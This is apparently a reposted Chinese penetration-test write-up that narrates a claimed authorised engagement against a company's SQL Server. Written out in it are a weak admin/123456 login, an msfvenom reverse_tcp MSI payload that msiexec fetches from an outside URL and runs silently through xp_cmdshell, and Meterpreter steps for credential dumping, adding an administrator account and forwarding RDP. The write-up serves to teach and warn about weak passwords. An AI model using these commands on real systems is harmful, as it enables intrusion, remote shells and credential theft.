渗透测试 | 一次虽然是system但是却略带艰难的过程

admin 2022年4月27日11:38:27评论50 views字数 1091阅读3分38秒阅读模式

作者:掌控安全-urfyyyy

前言

我从来没想到一个sa权限的sqlserver居然有这么多坑。

直接写一个成功的全流程步骤吧,踩坑太多写不过来。

没写到的姿势不代表没有,但大部分姿势确实没有。

这是一次某巨型企业的渗透项目,文中重码警告


web打点



经过一周的信息收集,找来又找去,发现了一个疑似系统配置的web系统,且存在弱口令(为什么每个企业都有弱口令呢….)

http://dataxxxxxxxx:9xx7/index.html

admin / 123456 直接起飞!

渗透测试 | 一次虽然是system但是却略带艰难的过程各个功能翻找一波,没有getshell的位置,就很nice,并且虽然有配置文件,但所有密码都是长度一样的*。

拿到权限



我啪的一下发现了一个日志功能,很快啊,又发现了连接数据库的json,有部分数据库密码是明文的,测试了一波,找到了几个允许外连的,挑其中一个下手(主要是这台密码短输着爽)

渗透测试 | 一次虽然是system但是却略带艰难的过程

因为是sqlserver的sa权限,所以开启xp_cmdshell直接一锤打爆他的服务器。


渗透测试 | 一次虽然是system但是却略带艰难的过程这时,领导看着我说,这不是必日穿,我说那肯定。

没想到后续还是挣扎了大半天。。。。

反弹shell



对方当前库对应的web系统没有open,所以无法写webshell访问,这里选择用msi的形式反弹

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.103 lport=7777 -f msi > test.msi

接着xp_cmdshell执行命令,获得session

msiexec.exe /q /i https://tongjingi.cn/test.msi

渗透测试 | 一次虽然是system但是却略带艰难的过程

内网?!



查看机器的进程,继续信息搜集,无杀软,无需免杀

渗透测试 | 一次虽然是system但是却略带艰难的过程加载kiwi获取管理员明文口令

渗透测试 | 一次虽然是system但是却略带艰难的过程试了挺多种方式,抓不到也解不出,不试了,既然是system,那就加个管理员

常规套路,3389一开,mstsc一连,岂不是美滋滋,进去深入内网,扬名立万


渗透测试 | 一次虽然是system但是却略带艰难的过程

3389不通,需要将其转发出来,msf使用portfwd进行转发

渗透测试 | 一次虽然是system但是却略带艰难的过程


emm…通到是通了,但出现了一个奇怪的报错,解决方法是改自己本机的注册表。

渗透测试 | 一次虽然是system但是却略带艰难的过程

解决方式如下图

渗透测试 | 一次虽然是system但是却略带艰难的过程


终于连上了


渗透测试 | 一次虽然是system但是却略带艰难的过程


你们猜怎么着?


内网无存活主机,溜了溜了,后续和客户确认,这台服务器是他们公司内部的一台孤儿机器。


希望各位管理员耗子尾汁,杜绝弱口令,不要耍这样的聪明,小聪明啊。


声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后

学习更多渗透技能!供靶场练习技能


渗透测试 | 一次虽然是system但是却略带艰难的过程

扫码领黑客视频资料及工具

渗透测试 | 一次虽然是system但是却略带艰难的过程


原文始发于微信公众号(渗透师老A):渗透测试 | 一次虽然是system但是却略带艰难的过程

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月27日11:38:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试 | 一次虽然是system但是却略带艰难的过程https://cn-sec.com/archives/950299.html

发表评论

匿名网友 填写信息